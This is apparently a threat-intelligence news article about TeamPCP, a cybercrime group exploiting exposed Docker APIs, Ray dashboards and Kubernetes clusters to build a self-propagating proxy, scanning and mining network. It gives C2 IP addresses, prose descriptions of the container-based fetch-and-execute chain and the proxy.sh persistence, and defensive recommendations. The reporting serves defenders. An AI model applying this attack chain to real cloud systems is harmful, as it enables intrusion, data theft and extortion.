TeamPCP’s Massive Exploitation of Cloud Misconfigurations: A Self-Propagating Cybercrime Network
In December 2025, a formidable cybercriminal group known as TeamPCP—also referred to as PCPcat, ShellForce, and DeadCatx3—emerged with a sophisticated campaign targeting cloud infrastructures. Their operations focused on exploiting exposed Docker APIs, Kubernetes clusters, Ray dashboards, Redis servers, and React2Shell vulnerabilities. This large-scale offensive aimed to establish a distributed proxy and scanning network, enabling the group to compromise servers for data exfiltration, ransomware deployment, extortion, and cryptocurrency mining.
The campaign’s intensity peaked around Christmas Day 2025, after which there was a noticeable decline in activity. Despite this, TeamPCP members continued to publicly share stolen data across various Telegram channels, indicating ongoing malicious endeavors.
Operational Scale and Integration
What distinguishes TeamPCP is not the novelty of their exploits but the scale and integration of their operations. They have transformed well-known vulnerabilities into a cloud-native exploitation platform, converting exposed infrastructures into a self-sustaining criminal ecosystem. Their strength lies in extensive automation, repurposing compromised servers for multiple malicious activities, including cryptomining, proxy networking, command-and-control relays, scanning operations, and data hosting.
Technical Insights and Infrastructure
Flare researchers identified 185 compromised servers running attacker-deployed containers executing standardized command patterns, providing clear visibility into TeamPCP’s methods. The primary command-and-control node, located at 67.217.57.240, was found on 182 compromised hosts. Additionally, a secondary infrastructure at 44.252.85.168 was observed on three other victim servers, suggesting operational redundancy or early-stage infrastructure migration.
The majority of leaked data originates from Western countries, with targeted organizations spanning the e-commerce, finance, and human resources sectors. Cloud infrastructures are predominantly affected, with Azure accounting for 61% and AWS for 36% of compromised servers, collectively representing 97% of the affected infrastructure.
Attack Mechanism and Worm-Like Propagation
TeamPCP’s operations commence with automated scanning across extensive IP ranges to identify exposed Docker APIs and Ray dashboards. Upon confirming access, the group remotely deploys malicious containers or jobs through unauthenticated management APIs.
For Docker environments, they pull an Alpine image and launch a host-networked, auto-restarting container that fetches and executes remote scripts. In Ray environments, they submit jobs executing base64-encoded bootstrap payloads.
The ‘proxy.sh’ script serves as the campaign’s operational backbone, installing proxy utilities, peer-to-peer tools, tunneling capabilities, and additional scanners that continuously search the internet for vulnerable servers. To ensure long-term persistence, the script registers multiple system services, effectively transforming each infected host into a self-maintaining scanning and relay node.
When Kubernetes environments are detected, the script branches into a separate execution path, deploying cluster-specific secondary payloads. This indicates that TeamPCP employs distinct tooling for cloud-native targets, rather than relying on generic Linux malware.
Implications and Recommendations
The emergence of TeamPCP underscores the critical need for robust cloud security practices. Organizations must prioritize the following measures to mitigate such threats:
1. Regular Security Audits: Conduct comprehensive assessments of cloud infrastructures to identify and rectify misconfigurations.
2. Access Controls: Implement strict access controls and authentication mechanisms to prevent unauthorized access to management APIs.
3. Patch Management: Ensure timely application of security patches to address known vulnerabilities.
4. Monitoring and Detection: Deploy advanced monitoring tools to detect unusual activities and potential breaches promptly.
5. Incident Response Planning: Develop and regularly update incident response plans to effectively address and mitigate security incidents.
By adopting these proactive measures, organizations can enhance their resilience against sophisticated cyber threats like those posed by TeamPCP.
